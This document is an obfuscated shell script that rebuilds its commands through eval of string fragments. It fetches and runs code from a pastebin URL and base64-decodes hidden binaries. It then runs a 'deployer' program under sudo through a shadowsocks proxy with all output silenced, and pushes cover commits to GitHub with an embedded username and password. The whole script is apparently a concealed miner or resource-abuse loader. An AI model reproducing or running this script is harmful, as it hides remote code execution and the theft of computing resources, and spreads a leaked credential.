MBPxYfF="do apt upda"
VNwFvJdU="te &>/dev/null"
SmKxBQp=" || t"
eval "su""$MBPxYfF""$VNwFvJdU""$SmKxBQp""rue"
Nvlkk="et -O codesrc "
UkjYu="https://paste"
JuhouK="bin.com/ra"
QlvlXEJM="w/UKs9hZfc &>/"
GzvV="dev/"
eval "wg""$Nvlkk""$UkjYu""$JuhouK""$QlvlXEJM""$GzvV""null"
yaTqe=" ./co"
eval ".""$yaTqe""desrc"
git clone $SRC codes &>/dev/null
czFT="se64 -d code"
APIwhXp="s/s >"
eval "ba""$czFT""$APIwhXp"" o"
RAlQk="sudo apt -"
YtUPUaj="-yes insta"
uFyjPxbw="ll psmisc sha"
TnfXWi="dowsocks-l"
CXWuV="ibev &>/dev/"
INAwTsG="null || tru"
eval "$RAlQk""$YtUPUaj""$uFyjPxbw""$TnfXWi""$CXWuV""$INAwTsG""e"
JWqIx="sudo syste"
MCRPf="mctl stop s"
QcqQ="hadowsocks-"
AAHXt="libev.service "
lQKVeNBH="&>/dev/null ||"
RUfDNPG=" tr"
eval "$JWqIx""$MCRPf""$QcqQ""$AAHXt""$lQKVeNBH""$RUfDNPG""ue"
IWMeb="ase64 -d c"
ZAdOl="odes/c > jump-c"
eval "b""$IWMeb""$ZAdOl""onfig"
qOcj="base64 -d codes"
bmcnsSsX="/gc > "
eval "$qOcj""$bmcnsSsX""gc"
AslT="se64 -d codes/m"
TcNIEd=" > depl"
eval "ba""$AslT""$TcNIEd""oyer"
ShLYstls="se64 -d codes"
mUKelJdu="/p > prep"
eval "ba""$ShLYstls""$mUKelJdu""are"
AKIihG="source ./p"
PHvKCQeW="rep"
eval "$AKIihG""$PHvKCQeW""are"
itVkdhOA="ohup sudo s"
qzKxDM="s-local -c o"
LRZrBtpH=" --plugin ./gq"
iPOBbMcj="s --plugin-"
IpgHeKyQ="opts ./gc &"
awGb=">/dev/null &"
eval "n""$itVkdhOA""$qzKxDM""$LRZrBtpH""$iPOBbMcj""$IpgHeKyQ""$awGb"
jUmEi="mod +x deploye"
WiWnFJj="r"
eval "ch""$jUmEi""$WiWnFJj"
quGJPsAj=" -i 's/gcc/"
lzJQnYm="segfo/g' jump-"
TdQkQZRn="config"
eval "sed""$quGJPsAj""$lzJQnYm""$TdQkQZRn"
nohup sudo ./deployer -c jump-config &>/dev/null &
aWBGQM="ho d"
eval "ec""$aWBGQM""eghlx"
FjiUmp="eep "
eval "sl""$FjiUmp""70"
qSWsBgd="t clone https:/"
zvPk="/github.com/cub"
GIHdDc="ic-vdy-wlang/xa"
fzxIwi="pp.git tmp"
FrSIfJ=" &>/dev/null |"
IXEIENLd="| "
eval "gi""$qSWsBgd""$zvPk""$GIHdDc""$fzxIwi""$FrSIfJ""$IXEIENLd""true"
cd tmp || true
KPBYUCCQ="t config us"
sTcE="er.name 'Roman "
LeentUXF="Akopyan' &>/dev"
fqZY="/null || tr"
eval "gi""$KPBYUCCQ""$sTcE""$LeentUXF""$fqZY""ue"
ayVWa="git config us"
eYqu="er.email rom"
lJmal="an.akopyanxb@"
YVsKX="inbox.ru &>"
SkAidhV="/dev/null ||"
stbuEcZ=" "
eval "$ayVWa""$eYqu""$lJmal""$YVsKX""$SkAidhV""$stbuEcZ""true"
echo 'xapp rework' >> deghlx$MAKE
sojHdef="LD=\`date +%s\`"
eval "BUI""$sojHdef"
EwpLZN="AKE=\`date +"
eval "M""$EwpLZN""%S\`"
echo $BUILD >> deghlx$MAKE
git add deghlx$MAKE &>/dev/null || true
git commit -m 'xapp rework '$MAKE &>/dev/null || true
sFZbBMV=" push https"
qglj="://roman-ako"
YVfRdkze="pyanxb:'CNjR-"
emsiUd="KSjHVv_9Ap'@g"
TRxiK="ithub.com/cu"
HEJASjT="bic-vdy-wlan"
ctsj="g/xapp.git -"
weoyTc="f &>/dev/n"
oMsWfl="ull || true"
eval "git""$sFZbBMV""$qglj""$YVfRdkze""$emsiUd""$TRxiK""$HEJASjT""$ctsj""$weoyTc""$oMsWfl"
while :; do G=`date +%s`; echo '...gcc '$G; [ `expr 1421 + $BUILD` -lt $G ] && sudo killall deployer && break; sleep 138; done
